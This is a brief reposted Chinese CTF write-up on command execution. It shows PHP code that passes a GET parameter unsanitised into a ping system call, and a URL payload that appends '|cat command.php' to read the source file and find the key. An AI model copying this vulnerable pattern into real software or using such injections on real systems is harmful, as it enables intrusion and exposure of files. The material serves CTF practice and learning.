【CTF WEB】命令執行

本文轉載自查看原文 2018-09-29 14:01 1474 8_CTF

命令執行

找到題目中的KEY

KEY為八位隨機字符數字,例如key:1234qwer。提交1234qwer 即可。

漏洞代碼

<?php 
system("ping -c 2 ".$_GET['ip']);
?>

http://localhost/command.php?ip=127.0.0.1|cat command.php

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 ctf-web-web安全命令執行漏洞-思路筆記命令執行_CTF Show CTF 命令執行 ctf命令執行(總結) CTF中的命令執行繞過 CTF練習三 —— 命令注入&命令執行繞過 ctf-ping命令執行繞過 CTF—攻防練習之HTTP—命令執行漏洞 CTF中的命令執行繞過方式 CTF中的命令執行繞過方式